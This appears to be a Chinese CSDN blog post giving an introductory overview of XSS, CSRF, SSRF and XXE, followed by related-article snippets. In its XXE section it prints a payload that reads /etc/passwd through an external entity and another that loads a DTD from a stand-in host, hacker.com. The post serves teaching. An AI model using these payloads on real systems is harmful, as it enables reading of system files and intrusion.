常见的漏洞(xss,csrf,xxe)

已于 2023-05-25 20:50:53 修改
阅读量258 收藏 1
点赞数
文章标签: xss 前端 javascript
于 2023-05-21 13:23:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75005708/article/details/130790583
版权

跨站脚本攻击(xss):通常指黑客通过“HTML注入”篡改网页,插入恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。

其实在一开的时候,这种攻击的演示案列是跨域的,所以叫“跨域脚本”,但是发展到今天,JavaScript的强大功能以及网站前端应用的复杂化,是否跨域已经不重要了,总共有三种类型

第一种类型:反射型XSS

只是简单的把用户输入的数据“反射”给浏览器。也就是说,只需要诱使用户点击一个恶意链接,才能攻击。反射型XSS也叫做非持久性XSS

第二种类型:存储型XSS

把用户输入的数据存储在服务器,比较常见的就是黑客写下一篇含有恶意javascript

代码的博客文章,所有访问该篇的用户,都会在他们的浏览器中执行这段恶意代码,黑客会把恶意的脚本保存到服务器上,所以这种攻击就叫做存储型XSS,也叫作持久性XSS

第三种类型:DOM BASED XSS

该类攻击是反射型XSS的变种。它通常是由于客户端接收到的脚本代码存在逻辑错误或者使用不当导致的。比如Javascript代码不正确地使用各种DOM方法(如document.write)和Javascript内部函数(如eval函数),动态拼接HTML代码和脚本代码就容易引发DOM型的跨站脚本攻击。
DOM型XSS与前面两种XSS的区别就在于DOM型XSS攻击的代码不需要与服务器端进行交互,DOM型XSS的触发基于浏览器端对DOM数据的解析来完成,也就是完全是客户端的事情。

判断是哪一种攻击

发送一次带XSS代码的请求,若只能在当前返回的数据包里发现XSS代码,则是反射型;若以后这个页面的返回包里都会有XSS代码,则是存储型;若在返回包里找不到XSS代码,则是DOM型

跨站请求伪造(CSRF):攻击者通过伪造用户的浏览器的请求,向访问一个用户自己曾经认证访问过的网站发送出去,使目标网站接收并误以为是用户的真实操作而去执行命令.

CSRF可以做什么?

攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及财产安全。

 CSRF防御

随着对 CSRF 漏洞研究的不断深入,不断涌现出一些专门针对 CSRF 漏洞进行检测的工具,如CSRFTester,CSRF Request Builder 等。

以 CSRFTester 工具为例,CSRF 漏洞检测工具的测试原理如下:使用 CSRFTester 进行测试时,首先需要抓取我们在浏览器中访问过的所有链接以及所有的表单等信息,然后通过在 CSRFTester 中修改相应的表单等信息,重新提交,这相当于一次伪造客户端请求。如果修改后的测试请求成功被网站服务器接受,则说明存在 CSRF 漏洞,当然此款工具也可以被用来进行 CSRF 攻击。也就相当于一次简单的测试

CSRF为什么可以成功攻击,本质原因是重要操作的所有参数都是可以被攻击者猜测到的,攻击者只有预测到URL的所有的参数与参数值,才可以成功构造一个伪造的请求:反之攻击者将无法攻击

SSRF(服务器端请求伪造)

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制

该漏洞通常由攻击者构造的请求传递给服务端,服务器端对传回的请求未作特殊处理直接执行而造成的。然后服务器以他的身份来访问服务器的其他资源

 危害

扫描内网(主机、端口)

向内部任意主机的任意端口发送精心构造的payload

攻击内网的Web应用

读取任意文件

 拒绝服务攻击

 XXE(XML外部实体注入)

我们先看看xml是什么

xml(扩展标记语言)是专门在world wide web(www)上传递信息的语言,就像html一样

再来看xxe

程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。
构造恶意 DTD

DTD的作用是定义 XML 文档的合法构建模块。包括元素的定义规则、元素间的关系规则、属性的定义规则

DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用,也就是文档类型定义

XXE 的产生正是外部实体引用的结果,可分为普通实体和参数实体

普通实体声明格式如下:

<!ENTITY 实体名 SYSTEM "URI">
或者
<!ENTITY 实体名 PUBLIC "public_ID" "URI">

eg:

<!DOCTYPE foo [<!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

 声明实体 xxe,用于读取 /etc/passwd 文件,然后通过 &xxe; 来引用执行

参数实体声明主要用于后续使用,与普通实体不同的是,它中间有百分号字符(%),其声明格式如下:

<!ENTITY % 实体名称 "实体的值">
或者
<!ENTITY % 实体名称 SYSTEM "URI">
<!DOCTYPE foo [
  	<!ENTITY  % xxe SYSTEM "http://hacker.com/evil.dtd" >
  	%xxe;
]>
<root>
  	<name>&evil;</name>
</root>

上面先声明 xxe 参数实体,引入外部实体 "http://hacker.com/evil.dtd",里面声明了一个叫 evil 的实体,用于读取 /etc/passwd 文件,最后在通过 &evil; 来引用执行。 

注意:不同语言支持的协议还不一样

芝诺的乌龟M
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入、XSSXXECSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
m0_57379855的博客
03-23 5565
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序中把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
网站安全防护之XSSXXE的区别是什么
网站安全专家
04-08 4432
很多客户会问到一些问题,我在这里做一些安全问题上的解答,这一些内容是xxexss的区别。首先这俩字母结构上就并不是太像,其次xss全称是Cross Site Scripting,而原先应该叫css,不和重叠样式表的css混淆,所以才改称为xss。中文上说是跨站脚本攻击,而xxe的全称是? 中文上说是XML外部实体注入,外部实体注入技术上一个存在于输入框,一个存在于XML。xss又分为储存型和反射型,其主要目的都是为了获取用户或者是管理员的会话,也就是cookie,还有基于多某的xss以及sel.
常见漏洞简介,网络安全(sql注入、xssxxeCSRF、文件上传等)
weixin_50651979的博客
03-26 1880
webshell就是以asp、php、jsp或者cgi等网页形式存在的一种命令执行方式,也可以将其称为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)webshell后门隐藏性高,可以轻松穿越防火墙,访问webshell时不会留下系统日志,指挥在网站的web日志中留下一些数据提交记录。
渗透测试-一文读懂XSSCSRF、SSRF、XXE漏洞原理、应用、防御
lza20001103的博客
08-25 2277
一文读懂XSSCSRF、SSRF、XXE漏洞原理、应用、防御 文章目录一文读懂XSSCSRF、SSRF、XXE漏洞原理、应用、防御一、相同点与不同点相同点不同点XXE漏洞二、防御1、XSS2、CSRF3、SSRF4、XXE三、面试题 一、相同点与不同点 相同点 XSSCSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。 不同点 XSS是服务器对用户输入的数据没有进行足够的过滤,导致客户端浏览器在渲染服务器返回的html页面时,出现了预期值之外的
XSS、SSRF、CSRFXXE 漏洞的区别
gududeajun的博客
12-11 6991
XSS(跨站脚本攻击) XSS属于客户端攻击,受害者最终是用户。但特别要注意的是网站管理员也属于用户之一,这就意味着XSS可以进行“服务端”攻击,因为管理员要比普通用户的权限大得多,一般管理员都可以对网站进行文件管理,数据管理等操作,而攻击者一般也是靠管理员身份作为“跳板”进行实施攻击。 XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击代码是javascript语言,但也会使用其它的脚本语言,例如:ActionScript、VBscript。而如今的互联网客户端脚本基本是基于Javasc
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解),看完直怼面试官(十种web漏洞).pdf 程序员面试宝典(安全知识)
02-11
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(二)XSS注入相关面试题 [ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(三)CSRF相关面试题 [ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(四)SSRF相关面试题...
hackerone-reports:HackerOne的最新披露的报告
04-05
HackerOne报告的顶部。 所有报告的原始信息都存储在data.csv 。 更新data.csv脚本是用Python 3编写的,并且需要selenium 。 每个脚本都包含一些有关其工作方式的信息。 脚本的运行顺序: fetcher.py filler.py rater...
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
10-16
1.6XSS、SSRF、CSRFXXE 漏洞 1.7 文件包含漏洞 1.9越权访问与逻辑漏洞 1.12社工与APT 1.13源代码审计与安全开发生命周期 1.14WAF绕过与后门分析 1.15系统提权与内网渗透 1.16敏感信息泄露 1.17获取Webshell 1.18...
YourNextBugTip:Twitter Bug赏金技巧和窍门的集合
02-06
YourNextBugTip:Twitter Bug赏金技巧和窍门的集合
高级java笔试题-Web-Security-Note:记录一些常见的Web安全站点
06-03
XXE 命令执行 上传 CSRF 同源策略 文件包含 缓存投毒 提权 反序列化 代码审计 解析漏洞 PHP Thinkphp Python flask JAVA JS 指纹识别技术 Burp 插件 Fuzz Payload JWT HTTP Request Smuggling 协议 编码 其他 漏洞...
XSSCSRFXXE-OBB
weixin_34015336的博客
11-19 337
等待笔记。。。 转载于:https://www.cnblogs.com/AardWolf/p/9982832.html
XSSCSRF、SSRF、XXE漏洞总结
weixin_48664996的博客
07-25 1487
目录 XSS XSS的分类: XSS的用途: Xss蠕虫原理: XSS常见的防御方法: CSRF CSRF的原理: CSRF的危害: CSRF的防范: SSRF SSRF攻击的原理: SSRF攻击的危害: SSRF攻击的防护: XXE XXE攻击的原理 XXE攻击的危害 XXE攻击的防护 XSS XSS全称是Cross Site Scripting,XSS攻击即跨站脚本攻击,是⼀种被动型,在不知道的情况下触发类似⽆感型的攻击手段,属于常用的攻击手段且能有...
哆啦靶场 SSRF、XXEXSSXSS学习、SQL部分通关教程
锋刃科技的博客
04-26 3397
SSRF漏洞靶场 来到SSRF首页 看看file_get_content.php 这应该就是file_get_content要包含的文件了 假设我们本地搭建一个1.php文件 然后包含这个文件即可 为什么不是php形式的样子,而是html的形式,因为htmlentities函数把包含进来的转换成html实体了 第二关 输入端口445,账号秘密都是r...
XSS,CSRF,SSRF三种漏洞的区别和共同点
18年3月萌新白帽子
07-03 1万+
以下言论均是个人在学习过程中总结而来,仅代表个人观点,由于博主也是web安全初学者,所以发表的观点很可能会存在一些错误或者有些不严谨的地方,如果您觉得哪里说的不对或者不合适,请随时在下方留言,希望能跟大家能够一起学习、进步,感谢。个人总结:相同点:XSSCSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。不同点:XSS是服务器对用户输入的...
XXE漏洞攻击与防御
weixin_30266829的博客
02-15 195
转自https://www.jianshu.com/p/7325b2ef8fc9 0x01 XML基础 在聊XXE之前,先说说相关的XML知识吧。 定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 文档结构 XML文档结...
初识XXE漏洞
Websec
03-22 1万+
0X01:何为XXE漏洞XXE是指xml外部实体攻击0x02:那么xml是什么?xml实体攻击是什么?XML百度是这样子的:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...
XXE漏洞
热门推荐
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
wireshark分析xxs攻击
最新发布
03-31
Wireshark是一款开源的网络协议分析工具,可以用于捕获和分析网络数据包。它可以帮助我们检测和分析各种网络攻击,包括跨站脚本攻击(XSS)。 跨站脚本攻击是一种常见的Web应用程序安全漏洞,攻击者通过在受害者的浏览器中注入恶意脚本来实现攻击目的。使用Wireshark来分析XSS攻击可以帮助我们了解攻击者是如何利用网络协议进行攻击的。 下面是使用Wireshark分析XSS攻击的步骤: 1. 打开Wireshark并选择要进行捕获的网络接口。 2. 开始捕获网络数据包。 3. 在浏览器中触发XSS攻击,例如访问一个存在XSS漏洞的网页。 4. 停止捕获数据包。 5. 使用Wireshark的过滤功能,过滤出与目标网页相关的数据包。 6. 分析数据包中的HTTP请求和响应,查找可能存在的恶意脚本注入。 7. 检查HTTP响应中的内容,查看是否存在恶意脚本或异常行为。 8. 根据分析结果采取相应的安全措施,修复漏洞或阻止攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值